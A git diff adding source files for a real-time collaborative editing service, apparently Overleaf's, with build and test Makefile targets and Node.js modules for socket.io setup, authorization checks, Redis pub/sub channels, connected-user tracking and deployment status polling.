--volume $(MONOREPO)/.eslintrc:/overleaf/.eslintrc --volume $(MONOREPO)/.prettierignore:/overleaf/.prettierignore --volume $(MONOREPO)/.prettierrc:/overleaf/.prettierrc --volume $(MONOREPO)/tsconfig.backend.json:/overleaf/tsconfig.backend.json ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) npm run --silent + +# Same but from the top of the monorepo +RUN_LINTING_MONOREPO = docker run --rm -v $(MONOREPO):$(MONOREPO) -w $(MONOREPO) node:20.18.2 npm run --silent + +SHELLCHECK_OPTS = \ + --shell=bash \ + --external-sources +SHELLCHECK_COLOR := $(if $(CI),--color=never,--color) +SHELLCHECK_FILES := { git ls-files "*.sh" -z; git grep -Plz "\A\#\!.*bash"; } | sort -zu + +shellcheck: + @$(SHELLCHECK_FILES) | xargs -0 -r docker run --rm -v $(HERE):/mnt -w /mnt \ + koalaman/shellcheck:stable $(SHELLCHECK_OPTS) $(SHELLCHECK_COLOR) + +shellcheck_fix: + @$(SHELLCHECK_FILES) | while IFS= read -r -d '' file; do \ + diff=$$(docker run --rm -v $(HERE):/mnt -w /mnt koalaman/shellcheck:stable $(SHELLCHECK_OPTS) --format=diff "$$file" 2>/dev/null); \ + if [ -n "$$diff" ] && ! 
echo "$$diff" | patch -p1 >/dev/null 2>&1; then echo "\033[31m$$file\033[0m"; \ + elif [ -n "$$diff" ]; then echo "$$file"; \ + else echo "\033[2m$$file\033[0m"; fi \ + done + +format: + $(RUN_LINTING) format + +format_ci: + $(RUN_LINTING_CI) format + +format_fix: + $(RUN_LINTING) format:fix + +lint: + $(RUN_LINTING) lint + +lint_ci: + $(RUN_LINTING_CI) lint + +lint_fix: + $(RUN_LINTING) lint:fix + +typecheck: + $(RUN_LINTING) types:check + +typecheck_ci: + $(RUN_LINTING_CI) types:check + +test: format lint typecheck shellcheck test_unit test_acceptance + +test_unit: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) run --rm test_unit + $(MAKE) test_unit_clean +endif + +test_clean: test_unit_clean +test_unit_clean: +ifneq (,$(wildcard test/unit)) + $(DOCKER_COMPOSE_TEST_UNIT) down -v -t 0 +endif + +test_acceptance: test_acceptance_clean test_acceptance_pre_run test_acceptance_run + $(MAKE) test_acceptance_clean + +test_acceptance_debug: test_acceptance_clean test_acceptance_pre_run test_acceptance_run_debug + $(MAKE) test_acceptance_clean + +test_acceptance_run: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance +endif + +test_acceptance_run_debug: +ifneq (,$(wildcard test/acceptance)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run -p 127.0.0.9:19999:19999 --rm test_acceptance npm run test:acceptance -- --inspect=0.0.0.0:19999 --inspect-brk +endif + +test_clean: test_acceptance_clean +test_acceptance_clean: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) down -v -t 0 + +test_acceptance_pre_run: +ifneq (,$(wildcard test/acceptance/js/scripts/pre-run)) + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance test/acceptance/js/scripts/pre-run +endif + +benchmarks: + $(DOCKER_COMPOSE_TEST_ACCEPTANCE) run --rm test_acceptance npm run benchmarks + +build: + docker build \ + --pull \ + --build-arg BUILDKIT_INLINE_CACHE=1 \ + --tag ci/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) \ + --tag us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):$(BRANCH_NAME) \ + --cache-from us-east1-docker.pkg.dev/overleaf-ops/ol-docker/$(PROJECT_NAME):main \ + --file Dockerfile \ + ../.. 
+ +tar: + $(DOCKER_COMPOSE) up tar + +publish: + + docker push $(DOCKER_REPO)/$(PROJECT_NAME):$(BRANCH_NAME)-$(BUILD_NUMBER) + + +.PHONY: clean \ + format format_fix \ + lint lint_fix \ + build_types typecheck \ + lint_ci format_ci typecheck_ci \ + shellcheck shellcheck_fix \ + test test_clean test_unit test_unit_clean \ + test_acceptance test_acceptance_debug test_acceptance_pre_run \ + test_acceptance_run test_acceptance_run_debug test_acceptance_clean \ + benchmarks \ + build tar publish \ diff --git a/services/real-time/app.js b/services/real-time/app.js new file mode 100644 index 0000000..38cb3ca --- /dev/null +++ b/services/real-time/app.js @@ -0,0 +1,340 @@ +// Metrics must be initialized before importing anything else +require('@overleaf/metrics/initialize') + +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const async = require('async') + +const logger = require('@overleaf/logger') +logger.initialize('real-time') +Metrics.event_loop.monitor(logger) +Metrics.open_sockets.monitor() + +const express = require('express') +const session = require('express-session') +const redis = require('@overleaf/redis-wrapper') + +const sessionRedisClient = redis.createClient(Settings.redis.websessions) + +const RedisStore = require('connect-redis')(session) +const SessionSockets = require('./app/js/SessionSockets') +const CookieParser = require('cookie-parser') + +const DrainManager = require('./app/js/DrainManager') +const HealthCheckManager = require('./app/js/HealthCheckManager') +const DeploymentManager = require('./app/js/DeploymentManager') + +const Path = require('node:path') + +// NOTE: debug is invoked for every blob that is put on the wire +const socketIoLogger = { + error(...message) { + logger.debug({ fromSocketIo: true, originalLevel: 'error' }, ...message) + }, + warn(...message) { + logger.debug({ fromSocketIo: true, originalLevel: 'warn' }, ...message) + }, + info() {}, + debug() {}, + log() {}, +} + +// monitor status file to take dark deployments out of the load-balancer +DeploymentManager.initialise() + +// Set up socket.io server +const app = express() + +const server = require('node:http').createServer(app) +server.keepAliveTimeout = Settings.keepAliveTimeoutMs +const io = require('socket.io').listen(server, { + logger: socketIoLogger, +}) + +// Bind to sessions +const sessionStore = new RedisStore({ client: sessionRedisClient }) + +if (!Settings.security.sessionSecret) { + throw new Error('No SESSION_SECRET provided.') +} + +const sessionSecrets = [ + Settings.security.sessionSecret, + Settings.security.sessionSecretUpcoming, + Settings.security.sessionSecretFallback, +].filter(Boolean) +const cookieParser = CookieParser(sessionSecrets) + +const sessionSockets = new SessionSockets( + io, + sessionStore, + cookieParser, + Settings.cookieName +) + +Metrics.injectMetricsRoute(app) + +io.configure(function () { + // Don't use socket.io to serve client + io.disable('browser client') + + // Fix for Safari 5 error of "Error during WebSocket handshake: location mismatch" + // See http://answers.dotcloud.com/question/578/problem-with-websocket-over-ssl-in-safari-with + io.set('match origin protocol', true) + + io.set('transports', ['websocket', 'xhr-polling']) + + if (Settings.allowedCorsOrigins) { + // Create a regex for matching origins, allowing wildcard subdomains + const allowedCorsOriginsRegex = new RegExp( + `^${Settings.allowedCorsOrigins.replaceAll('.', '\\.').replace('://*', '://[^.]+')}(?::443)?$` + ) + + io.set('origins', 
function (origin, req) { + const normalizedOrigin = URL.parse(origin).origin + const originIsValid = allowedCorsOriginsRegex.test(normalizedOrigin) + + if (req.headers.origin) { + if (!originIsValid) { + logger.warn( + { normalizedOrigin, origin, req }, + 'Origin header does not match allowed origins' + ) + } + return originIsValid + } + + if (!originIsValid) { + // There is no Origin header and the Referrer does not satisfy the + // constraints. We're going to pass this anyway for now but log it + logger.warn( + { req, referer: req.headers.referer }, + 'Referrer header does not match allowed origins' + ) + } + + return true + }) + } +}) + +// Serve socket.io.js client file from imported dist folder +// The express sendFile method correctly handles conditional +// requests using the last-modified time and etag (which is +// a combination of mtime and size) +const socketIOClientFolder = require('socket.io-client').dist +app.get('/socket.io/socket.io.js', function (req, res) { + res.sendFile(Path.join(socketIOClientFolder, 'socket.io.min.js')) +}) + +// a 200 response on '/' is required for load balancer health checks +// these operate separately from kubernetes readiness checks +app.get('/', function (req, res) { + if (Settings.shutDownInProgress || DeploymentManager.deploymentIsClosed()) { + res.sendStatus(503) // Service unavailable + } else { + res.send('real-time is open') + } +}) + +app.get('/status', function (req, res) { + if (Settings.shutDownInProgress) { + res.sendStatus(503) // Service unavailable + } else { + res.send('real-time is alive') + } +}) + +app.get('/debug/events', function (req, res) { + Settings.debugEvents = parseInt(req.query.count, 10) || 20 + logger.info({ count: Settings.debugEvents }, 'starting debug mode') + res.send(`debug mode will log next ${Settings.debugEvents} events`) +}) + +const rclient = require('@overleaf/redis-wrapper').createClient( + Settings.redis.realtime +) + +function healthCheck(req, res) { + rclient.healthCheck(function (error) { + if (error) { + logger.err({ err: error }, 'failed redis health check') + res.sendStatus(500) + } else if (HealthCheckManager.isFailing()) { + const status = HealthCheckManager.status() + logger.err({ pubSubErrors: status }, 'failed pubsub health check') + res.sendStatus(500) + } else { + res.sendStatus(200) + } + }) +} +app.get( + '/health_check', + (req, res, next) => { + if (Settings.shutDownComplete) { + return res.sendStatus(503) + } + next() + }, + healthCheck +) + +app.get('/health_check/redis', healthCheck) + +// log http requests for routes defined from this point onwards +app.use(Metrics.http.monitor(logger)) + +const Router = require('./app/js/Router') +Router.configure(app, io, sessionSockets) + +const WebsocketLoadBalancer = require('./app/js/WebsocketLoadBalancer') +WebsocketLoadBalancer.listenForEditorEvents(io) + +const DocumentUpdaterController = require('./app/js/DocumentUpdaterController') +DocumentUpdaterController.listenForUpdatesFromDocumentUpdater(io) + +const { port } = Settings.internal.realTime +const { host } = Settings.internal.realTime + +server.listen(port, host, function (error) { + if (error) { + throw error + } + logger.info(`realtime starting up, listening on ${host}:${port}`) +}) + +// Stop huge stack traces in logs from all the socket.io parsing steps. 
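
For reference, the wildcard accepted in `Settings.allowedCorsOrigins` above is compiled into an anchored regular expression in which `*` matches exactly one subdomain label, with an optional explicit `:443` port. A standalone sketch of that behaviour, using a made-up `https://*.ovl.example` value in place of the real setting:

    // Same construction as in io.configure() above, with a made-up value.
    const allowedCorsOrigins = 'https://*.ovl.example'
    const allowedCorsOriginsRegex = new RegExp(
      `^${allowedCorsOrigins.replaceAll('.', '\\.').replace('://*', '://[^.]+')}(?::443)?$`
    )

    console.log(allowedCorsOriginsRegex.test('https://app.ovl.example')) // true
    console.log(allowedCorsOriginsRegex.test('https://app.ovl.example:443')) // true (default https port)
    console.log(allowedCorsOriginsRegex.test('https://a.b.ovl.example')) // false ([^.]+ stops at a dot)
    console.log(allowedCorsOriginsRegex.test('https://evil.example')) // false
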
+Error.stackTraceLimit = 10 + +function shutdownAfterAllClientsHaveDisconnected() { + const connectedClients = io.sockets.clients().length + if (connectedClients === 0) { + logger.info({}, 'no clients connected, exiting') + process.exit() + } else { + logger.info( + { connectedClients }, + 'clients still connected, not shutting down yet' + ) + setTimeout(() => shutdownAfterAllClientsHaveDisconnected(), 5_000) + } +} + +function drainAndShutdown(signal) { + if (Settings.shutDownInProgress) { + logger.info({ signal }, 'shutdown already in progress, ignoring signal') + } else { + Settings.shutDownInProgress = true + const { statusCheckInterval } = Settings + if (statusCheckInterval) { + logger.info( + { signal }, + `received interrupt, delay drain by ${statusCheckInterval}ms` + ) + } + setTimeout(function () { + logger.info( + { signal }, + `received interrupt, starting drain over ${shutdownDrainTimeWindow} mins` + ) + DrainManager.startDrainTimeWindow(io, shutdownDrainTimeWindow, () => { + shutdownAfterAllClientsHaveDisconnected() + setTimeout(() => { + const staleClients = io.sockets.clients() + if (staleClients.length !== 0) { + logger.info( + { staleClients: staleClients.map(client => client.id) }, + 'forcefully disconnecting stale clients' + ) + staleClients.forEach(client => { + client.disconnect() + }) + } + // Mark the node as unhealthy. + Settings.shutDownComplete = true + }, Settings.gracefulReconnectTimeoutMs) + }) + }, statusCheckInterval) + } +} + +Settings.shutDownInProgress = false +const shutdownDrainTimeWindow = parseInt(Settings.shutdownDrainTimeWindow, 10) +if (Settings.shutdownDrainTimeWindow) { + logger.info({ shutdownDrainTimeWindow }, 'shutdownDrainTimeWindow enabled') + for (const signal of [ + 'SIGINT', + 'SIGHUP', + 'SIGQUIT', + 'SIGUSR1', + 'SIGUSR2', + 'SIGTERM', + 'SIGABRT', + ]) { + process.on(signal, drainAndShutdown) + } // signal is passed as argument to event handler + + // global exception handler + if (Settings.errors && Settings.errors.catchUncaughtErrors) { + process.removeAllListeners('uncaughtException') + process.on('uncaughtException', function (error) { + if ( + [ + 'ETIMEDOUT', + 'EHOSTUNREACH', + 'EPIPE', + 'ECONNRESET', + 'ERR_STREAM_WRITE_AFTER_END', + ].includes(error.code) || + // socket.io error handler sending on polling connection again. 
+ (error.code === 'ERR_HTTP_HEADERS_SENT' && + error.stack && + error.stack.includes('Transport.error')) + ) { + Metrics.inc('disconnected_write', 1, { status: error.code }) + return logger.warn( + { err: error }, + 'attempted to write to disconnected client' + ) + } + logger.error({ err: error }, 'uncaught exception') + if (Settings.errors && Settings.errors.shutdownOnUncaughtError) { + drainAndShutdown('SIGABRT') + } + }) + } +} + +if (Settings.continualPubsubTraffic) { + logger.debug('continualPubsubTraffic enabled') + + const pubsubClient = redis.createClient(Settings.redis.pubsub) + const clusterClient = redis.createClient(Settings.redis.websessions) + + const publishJob = function (channel, callback) { + const checker = new HealthCheckManager(channel) + logger.debug({ channel }, 'sending pub to keep connection alive') + const json = JSON.stringify({ + health_check: true, + key: checker.id, + date: new Date().toString(), + }) + Metrics.summary(`redis.publish.${channel}`, json.length) + pubsubClient.publish(channel, json, function (err) { + if (err) { + logger.err({ err, channel }, 'error publishing pubsub traffic to redis') + } + const blob = JSON.stringify({ keep: 'alive' }) + Metrics.summary('redis.publish.cluster-continual-traffic', blob.length) + clusterClient.publish('cluster-continual-traffic', blob, callback) + }) + } + + const runPubSubTraffic = () => + async.map(['applied-ops', 'editor-events'], publishJob, () => + setTimeout(runPubSubTraffic, 1000 * 20) + ) + + runPubSubTraffic() +} diff --git a/services/real-time/app/js/AuthorizationManager.js b/services/real-time/app/js/AuthorizationManager.js new file mode 100644 index 0000000..b8633ad --- /dev/null +++ b/services/real-time/app/js/AuthorizationManager.js @@ -0,0 +1,81 @@ +const { NotAuthorizedError } = require('./Errors') + +let AuthorizationManager +module.exports = AuthorizationManager = { + assertClientCanViewProject(client, callback) { + AuthorizationManager._assertClientHasPrivilegeLevel( + client, + ['readOnly', 'readAndWrite', 'review', 'owner'], + callback + ) + }, + + assertClientCanEditProject(client, callback) { + AuthorizationManager._assertClientHasPrivilegeLevel( + client, + ['readAndWrite', 'owner'], + callback + ) + }, + + assertClientCanReviewProject(client, callback) { + AuthorizationManager._assertClientHasPrivilegeLevel( + client, + ['readAndWrite', 'owner', 'review'], + callback + ) + }, + + _assertClientHasPrivilegeLevel(client, allowedLevels, callback) { + if (allowedLevels.includes(client.ol_context.privilege_level)) { + callback(null) + } else { + callback(new NotAuthorizedError()) + } + }, + + assertClientCanViewProjectAndDoc(client, docId, callback) { + AuthorizationManager.assertClientCanViewProject(client, function (error) { + if (error) { + return callback(error) + } + AuthorizationManager._assertClientCanAccessDoc(client, docId, callback) + }) + }, + + assertClientCanEditProjectAndDoc(client, docId, callback) { + AuthorizationManager.assertClientCanEditProject(client, function (error) { + if (error) { + return callback(error) + } + AuthorizationManager._assertClientCanAccessDoc(client, docId, callback) + }) + }, + + assertClientCanReviewProjectAndDoc(client, docId, callback) { + AuthorizationManager.assertClientCanReviewProject(client, function (error) { + if (error) { + return callback(error) + } + AuthorizationManager._assertClientCanAccessDoc(client, docId, callback) + }) + }, + + _assertClientCanAccessDoc(client, docId, callback) { + if (client.ol_context[`doc:${docId}`] === 'allowed') { 
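
These assertions all follow the Node callback convention: they yield `null` on success and a `NotAuthorizedError` otherwise, with per-doc access tracked on `client.ol_context` by the `addAccessToDoc`/`removeAccessToDoc` helpers just below. A hypothetical caller, with a hand-built `client` object standing in for a real socket:

    const AuthorizationManager = require('./app/js/AuthorizationManager')

    // Hand-built stand-in; in the service, ol_context is populated on join.
    const client = { ol_context: { privilege_level: 'readOnly' } }

    AuthorizationManager.addAccessToDoc(client, 'doc-123', () => {})

    // A readOnly client may view the doc...
    AuthorizationManager.assertClientCanViewProjectAndDoc(client, 'doc-123', err => {
      console.log('view:', err || 'allowed') // view: allowed
    })

    // ...but may not edit it.
    AuthorizationManager.assertClientCanEditProjectAndDoc(client, 'doc-123', err => {
      console.log('edit:', err ? 'NotAuthorizedError' : 'allowed') // edit: NotAuthorizedError
    })
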
+ callback(null) + } else { + callback(new NotAuthorizedError()) + } + }, + + addAccessToDoc(client, docId, callback) { + client.ol_context[`doc:${docId}`] = 'allowed' + callback(null) + }, + + removeAccessToDoc(client, docId, callback) { + delete client.ol_context[`doc:${docId}`] + callback(null) + }, +} diff --git a/services/real-time/app/js/ChannelManager.js b/services/real-time/app/js/ChannelManager.js new file mode 100644 index 0000000..42b6172 --- /dev/null +++ b/services/real-time/app/js/ChannelManager.js @@ -0,0 +1,101 @@ +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const settings = require('@overleaf/settings') +const OError = require('@overleaf/o-error') + +const ClientMap = new Map() // for each redis client, store a Map of subscribed channels (channelname -> subscribe promise) + +// Manage redis pubsub subscriptions for individual projects and docs, ensuring +// that we never subscribe to a channel multiple times. The socket.io side is +// handled by RoomManager. + +module.exports = { + getClientMapEntry(rclient) { + // return the per-client channel map if it exists, otherwise create and + // return an empty map for the client. + return ( + ClientMap.get(rclient) || ClientMap.set(rclient, new Map()).get(rclient) + ) + }, + + subscribe(rclient, baseChannel, id) { + const clientChannelMap = this.getClientMapEntry(rclient) + const channel = `${baseChannel}:${id}` + const actualSubscribe = function () { + // subscribe is happening in the foreground and it should reject + return rclient + .subscribe(channel) + .finally(function () { + if (clientChannelMap.get(channel) === subscribePromise) { + clientChannelMap.delete(channel) + } + }) + .then(function () { + logger.debug({ channel }, 'subscribed to channel') + metrics.inc(`subscribe.${baseChannel}`) + }) + .catch(function (err) { + logger.error({ channel, err }, 'failed to subscribe to channel') + metrics.inc(`subscribe.failed.${baseChannel}`) + // add context for the stack-trace at the call-site + throw new OError('failed to subscribe to channel', { + channel, + }).withCause(err) + }) + } + + const pendingActions = clientChannelMap.get(channel) || Promise.resolve() + const subscribePromise = pendingActions.then( + actualSubscribe, + actualSubscribe + ) + clientChannelMap.set(channel, subscribePromise) + logger.debug({ channel }, 'planned to subscribe to channel') + return subscribePromise + }, + + unsubscribe(rclient, baseChannel, id) { + const clientChannelMap = this.getClientMapEntry(rclient) + const channel = `${baseChannel}:${id}` + const actualUnsubscribe = function () { + // unsubscribe is happening in the background, it should not reject + return rclient + .unsubscribe(channel) + .finally(function () { + if (clientChannelMap.get(channel) === unsubscribePromise) { + clientChannelMap.delete(channel) + } + }) + .then(function () { + logger.debug({ channel }, 'unsubscribed from channel') + metrics.inc(`unsubscribe.${baseChannel}`) + }) + .catch(function (err) { + logger.error({ channel, err }, 'unsubscribed from channel') + metrics.inc(`unsubscribe.failed.${baseChannel}`) + }) + } + + const pendingActions = clientChannelMap.get(channel) || Promise.resolve() + const unsubscribePromise = pendingActions.then( + actualUnsubscribe, + actualUnsubscribe + ) + clientChannelMap.set(channel, unsubscribePromise) + logger.debug({ channel }, 'planned to unsubscribe from channel') + return unsubscribePromise + }, + + publish(rclient, baseChannel, id, data) { + let channel + 
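
The map of pending promises above serializes subscribe and unsubscribe per channel, so a rapid unsubscribe/resubscribe cannot overtake an in-flight Redis operation: each new action is chained onto the previous one and runs whether the predecessor resolved or rejected. A toy model of that chaining with no Redis involved (every name below is local to the sketch):

    const pending = new Map() // channel -> tail of that channel's action chain

    function enqueue(channel, action) {
      const tail = pending.get(channel) || Promise.resolve()
      // Run the action regardless of the previous outcome, mirroring
      // pendingActions.then(actualSubscribe, actualSubscribe) above.
      const next = tail.then(action, action)
      pending.set(channel, next)
      return next
    }

    // The unsubscribe only starts once the (slow) subscribe has settled.
    enqueue('applied-ops:doc-1', () =>
      new Promise(resolve => setTimeout(() => resolve(console.log('subscribed')), 50))
    )
    enqueue('applied-ops:doc-1', () => console.log('unsubscribed'))
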
metrics.summary(`redis.publish.${baseChannel}`, data.length) + if (id === 'all' || !settings.publishOnIndividualChannels) { + channel = baseChannel + } else { + channel = `${baseChannel}:${id}` + } + // we publish on a different client to the subscribe, so we can't + // check for the channel existing here + rclient.publish(channel, data) + }, +} diff --git a/services/real-time/app/js/ConnectedUsersManager.js b/services/real-time/app/js/ConnectedUsersManager.js new file mode 100644 index 0000000..1421e8e --- /dev/null +++ b/services/real-time/app/js/ConnectedUsersManager.js @@ -0,0 +1,249 @@ +const async = require('async') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const redis = require('@overleaf/redis-wrapper') +const OError = require('@overleaf/o-error') +const Metrics = require('@overleaf/metrics') +const rclient = redis.createClient(Settings.redis.realtime) +const Keys = Settings.redis.realtime.key_schema + +const ONE_HOUR_IN_S = 60 * 60 +const ONE_DAY_IN_S = ONE_HOUR_IN_S * 24 +const FOUR_DAYS_IN_S = ONE_DAY_IN_S * 4 + +const USER_TIMEOUT_IN_S = ONE_HOUR_IN_S / 4 +const REFRESH_TIMEOUT_IN_S = 10 // only show clients which have responded to a refresh request in the last 10 seconds + +function recordProjectNotEmptySinceMetric(res, status) { + const diff = Date.now() / 1000 - parseInt(res, 10) + const BUCKETS = [ + 0, + ONE_HOUR_IN_S, + 2 * ONE_HOUR_IN_S, + ONE_DAY_IN_S, + 2 * ONE_DAY_IN_S, + 7 * ONE_DAY_IN_S, + 30 * ONE_DAY_IN_S, + ] + Metrics.histogram('project_not_empty_since', diff, BUCKETS, { status }) +} + +module.exports = { + // Use the same method for when a user connects, and when a user sends a cursor + // update. This way we don't care if the connected_user key has expired when + // we receive a cursor update. + updateUserPosition(projectId, clientId, user, cursorData, callback) { + logger.debug({ projectId, clientId }, 'marking user as joined or connected') + + const multi = rclient.multi() + + multi.sadd(Keys.clientsInProject({ project_id: projectId }), clientId) + multi.scard(Keys.clientsInProject({ project_id: projectId })) + multi.expire( + Keys.clientsInProject({ project_id: projectId }), + FOUR_DAYS_IN_S + ) + + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'last_updated_at', + Date.now() + ) + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'user_id', + user._id + ) + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'first_name', + user.first_name || '' + ) + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'last_name', + user.last_name || '' + ) + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'email', + user.email || '' + ) + + if (cursorData) { + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'cursorData', + JSON.stringify(cursorData) + ) + } + multi.expire( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + USER_TIMEOUT_IN_S + ) + + multi.exec(function (err, res) { + if (err) { + err = new OError('problem marking user as connected').withCause(err) + } + const [, nConnectedClients] = res + Metrics.inc('editing_session_mode', 1, { + method: cursorData ? 'update' : 'connect', + status: nConnectedClients === 1 ? 
'single' : 'multi', + }) + callback(err) + }) + }, + + refreshClient(projectId, clientId) { + logger.debug({ projectId, clientId }, 'refreshing connected client') + const multi = rclient.multi() + multi.hset( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + 'last_updated_at', + Date.now() + ) + multi.expire( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + USER_TIMEOUT_IN_S + ) + multi.exec(function (err) { + if (err) { + logger.err( + { err, projectId, clientId }, + 'problem refreshing connected client' + ) + } + }) + }, + + markUserAsDisconnected(projectId, clientId, callback) { + logger.debug({ projectId, clientId }, 'marking user as disconnected') + const multi = rclient.multi() + multi.srem(Keys.clientsInProject({ project_id: projectId }), clientId) + multi.scard(Keys.clientsInProject({ project_id: projectId })) + multi.expire( + Keys.clientsInProject({ project_id: projectId }), + FOUR_DAYS_IN_S + ) + multi.del( + Keys.connectedUser({ project_id: projectId, client_id: clientId }) + ) + multi.exec(function (err, res) { + if (err) { + err = new OError('problem marking user as disconnected').withCause(err) + } + const [, nConnectedClients] = res + const status = + nConnectedClients === 0 + ? 'empty' + : nConnectedClients === 1 + ? 'single' + : 'multi' + Metrics.inc('editing_session_mode', 1, { + method: 'disconnect', + status, + }) + if (status === 'empty') { + rclient.getdel(Keys.projectNotEmptySince({ projectId }), (err, res) => { + if (err) { + logger.warn( + { err, projectId }, + 'could not collect projectNotEmptySince' + ) + } else if (res) { + recordProjectNotEmptySinceMetric(res, status) + } + }) + } else { + // Only populate projectNotEmptySince when more clients remain connected. + const nowInSeconds = Math.ceil(Date.now() / 1000).toString() + // We can go back to SET GET after upgrading to redis 7.0+ + const multi = rclient.multi() + multi.get(Keys.projectNotEmptySince({ projectId })) + multi.set( + Keys.projectNotEmptySince({ projectId }), + nowInSeconds, + 'NX', + 'EX', + 31 * ONE_DAY_IN_S + ) + multi.exec((err, res) => { + if (err) { + logger.warn( + { err, projectId }, + 'could not get/set projectNotEmptySince' + ) + } else if (res[0]) { + recordProjectNotEmptySinceMetric(res[0], status) + } + }) + } + callback(err) + }) + }, + + _getConnectedUser(projectId, clientId, callback) { + rclient.hgetall( + Keys.connectedUser({ project_id: projectId, client_id: clientId }), + function (err, result) { + if (err) { + err = new OError('problem fetching connected user details', { + other_client_id: clientId, + }).withCause(err) + return callback(err) + } + if (!(result && result.user_id)) { + result = { + connected: false, + client_id: clientId, + } + } else { + result.connected = true + result.client_id = clientId + result.client_age = + (Date.now() - parseInt(result.last_updated_at, 10)) / 1000 + if (result.cursorData) { + try { + result.cursorData = JSON.parse(result.cursorData) + } catch (e) { + OError.tag(e, 'error parsing cursorData JSON', { + other_client_id: clientId, + cursorData: result.cursorData, + }) + return callback(e) + } + } + } + callback(err, result) + } + ) + }, + + getConnectedUsers(projectId, callback) { + const self = this + rclient.smembers( + Keys.clientsInProject({ project_id: projectId }), + function (err, results) { + if (err) { + err = new OError('problem getting clients in project').withCause(err) + return callback(err) + } + const jobs = results.map( + clientId => cb => self._getConnectedUser(projectId, 
clientId, cb) + ) + async.series(jobs, function (err, users) { + if (err) { + OError.tag(err, 'problem getting connected users') + return callback(err) + } + users = users.filter( + user => + user && user.connected && user.client_age < REFRESH_TIMEOUT_IN_S + ) + callback(null, users) + }) + } + ) + }, +} diff --git a/services/real-time/app/js/DeploymentManager.js b/services/real-time/app/js/DeploymentManager.js new file mode 100644 index 0000000..58c1618 --- /dev/null +++ b/services/real-time/app/js/DeploymentManager.js @@ -0,0 +1,62 @@ +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const fs = require('node:fs') + +// Monitor a status file (e.g. /etc/real_time_status) periodically and close the +// service if the file contents don't contain the matching deployment colour. + +const FILE_CHECK_INTERVAL = 5000 +const statusFile = settings.deploymentFile +const deploymentColour = settings.deploymentColour + +let serviceCloseTime + +function updateDeploymentStatus(fileContent) { + const closed = fileContent && !fileContent.includes(deploymentColour) + if (closed && !settings.serviceIsClosed) { + settings.serviceIsClosed = true + serviceCloseTime = Date.now() + 60 * 1000 // delay closing by 1 minute + logger.info({ fileContent }, 'closing service') + } else if (!closed && settings.serviceIsClosed) { + settings.serviceIsClosed = false + logger.info({ fileContent }, 'opening service') + } +} + +function pollStatusFile() { + fs.readFile(statusFile, { encoding: 'utf8' }, (err, fileContent) => { + if (err) { + logger.error( + { file: statusFile, fsErr: err }, + 'error reading service status file' + ) + return + } + updateDeploymentStatus(fileContent) + }) +} + +function checkStatusFileSync() { + // crash on start up if file does not exist + const content = fs.readFileSync(statusFile, { encoding: 'utf8' }) + updateDeploymentStatus(content) + if (settings.serviceIsClosed) { + serviceCloseTime = Date.now() // skip closing delay on start up + } +} + +module.exports = { + initialise() { + if (statusFile && deploymentColour) { + logger.info( + { statusFile, deploymentColour, interval: FILE_CHECK_INTERVAL }, + 'monitoring deployment status file' + ) + checkStatusFileSync() // perform an initial synchronous check at start up + setInterval(pollStatusFile, FILE_CHECK_INTERVAL) // continue checking periodically + } + }, + deploymentIsClosed() { + return settings.serviceIsClosed && Date.now() >= serviceCloseTime + }, +} diff --git a/services/real-time/app/js/DocumentUpdaterController.js b/services/real-time/app/js/DocumentUpdaterController.js new file mode 100644 index 0000000..3fd22d3 --- /dev/null +++ b/services/real-time/app/js/DocumentUpdaterController.js @@ -0,0 +1,184 @@ +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const RedisClientManager = require('./RedisClientManager') +const SafeJsonParse = require('./SafeJsonParse') +const EventLogger = require('./EventLogger') +const HealthCheckManager = require('./HealthCheckManager') +const RoomManager = require('./RoomManager') +const ChannelManager = require('./ChannelManager') +const metrics = require('@overleaf/metrics') + +let DocumentUpdaterController +module.exports = DocumentUpdaterController = { + // DocumentUpdaterController is responsible for updates that come via Redis + // Pub/Sub from the document updater. 
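
Messages arrive on the `applied-ops` channel as JSON strings, and the handler below distinguishes three shapes by their fields. Sketches of each shape (the field names are taken from `_processMessageFromDocumentUpdater` below; the values are invented):

    // 1. An applied operation, fanned out to the clients in the doc's room.
    const opMessage = {
      doc_id: 'doc-123',
      op: { v: 42, doc: 'doc-123', op: [{ i: 'hello', p: 0 }] },
      _id: 'event-1', // enables duplicate detection when checkEventOrder is set
    }

    // 2. An error, which disconnects every client in the doc's room.
    const errorMessage = { doc_id: 'doc-123', error: 'doc not found' }

    // 3. A pub/sub health check, acknowledged via HealthCheckManager.
    const healthCheckMessage = { health_check: true, key: 'checker-1' }

    // All three travel over Redis as JSON:
    console.log(JSON.stringify(opMessage))
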
